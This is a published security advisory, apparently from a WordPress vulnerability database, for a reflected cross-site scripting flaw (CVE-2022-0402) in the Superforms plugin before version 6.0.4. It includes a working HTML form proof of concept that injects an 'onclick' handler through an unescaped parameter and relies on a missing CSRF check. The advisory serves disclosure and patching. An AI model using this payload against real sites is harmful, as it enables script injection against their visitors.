WordPress Plugin Vulnerabilities

Superforms < 6.0.4 - Reflected Cross-Site Scripting

Description

The plugin does not escape the bob_czy_panstwa_sprawa_zostala_rozwiazana parameter before outputting it back in an attribute via the super_language_switcher AJAX action, leading to a Reflected Cross-Site Scripting. The action is also lacking CSRF, making the attack easier to perform against any user.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="super_language_switcher" />
      <input type="hidden" name="form_id" value="1030" />
      <input type="hidden" name="i18n" value="pl_PL" />
      <input type="hidden" name="parameters[bob_co_mozemy_poprawic_aby_panstwa_ocena_byla_wyzsza]" value="555" />
      <input type="hidden" name="parameters[bob_co_sprawilo_taka_ocene_zaangazowania_konsultanta]" value="555" />
      <input type="hidden" name="parameters[bob_czy_konsultant_wytlumaczyl_dlaczego_nie_jest_w_stanie_rozwiazac_sprawy]" value="1" />
      <input type="hidden" name="parameters[bob_czy_panstwa_sprawa_zostala_rozwiazana]" value=" accesskey accesskey=x onclick=alert(document.domain) id=test" />
      <input type="hidden" name="parameters[bob_dlaczego_panstwa_zdaniem_nie_udalo_sie_rozwiazac_problemu]" value="555" />
      <input type="hidden" name="parameters[bob_jak_duzo_wysilku_wlozyles_w_zalatwienie_konkretnej_sprawy]" value="1" />
      <input type="hidden" name="parameters[bob_jakie_czynniki_mozemy_poprawic_aby_panstwa_ocena_byla_wyzsza]" value="555" />
      <input type="hidden" name="parameters[bob_na_koniec_prosimy_o_podsumowanie_panstwa_oceny_oraz_napisanie_sugestii_i_uag_dotyczacych_obslugi]" value="555" />
      <input type="hidden" name="parameters[bob_na_podstawie_ostatniej_rozmowy_z_naszym_konsultantem_ocen_w_skali_zaangazowanie_w_rozwiazanie_problemu]" value="1" />
      <input type="hidden" name="parameters[bob_w_jakim_stopniu_sa_panstwo_zadowoleni_z_obslugi_konsultanta]" value="1" />
      <input type="hidden" name="parameters[hidden_form_id]" value="1030" />
      <input type="hidden" name="parameters[id]" value="1" />
      <input type="hidden" name="parameters[super_ajax_nonce]" value="" />
      <input type="hidden" name="parameters[super_hp]" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
super-forms
Fixed in 6.0.4

References

CVE
CVE-2022-0402
URL
https://github.com/RensTillmann/super-forms/commit/c19d65abbe43d9b6359c1bf3498dc697d0c19d02

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
4.7 (medium)

Miscellaneous

Original Researcher
Koutrouss Naddara
Submitter
Koutrouss Naddara
Verified
Yes
WPVDB ID
2e2e2478-2488-4c91-8af8-69b07783854f

Timeline

Publicly Published
2022-01-31 (about 2 years ago)
Added
2022-01-31 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)

Other

Published
Title
Published
2023-03-27
Title
Contact Forms by Cimatti < 1.5.5 - Reflected XSS
Published
2024-04-05
Title
MailMunch – Grow your Email List < 3.1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting
Published
2021-06-15
Title
WP Google Maps Pro < 8.1.12 - Multiple Admin+ Stored Cross-Site Scripting
Published
2022-08-15
Title
WP Database Backup < 5.9 - Admin+ Stored Cross-Site Scripting
Published
2023-11-07
Title
CodeBard's Patron Button and Widgets for Patreon < 2.2.0 - Reflected XSS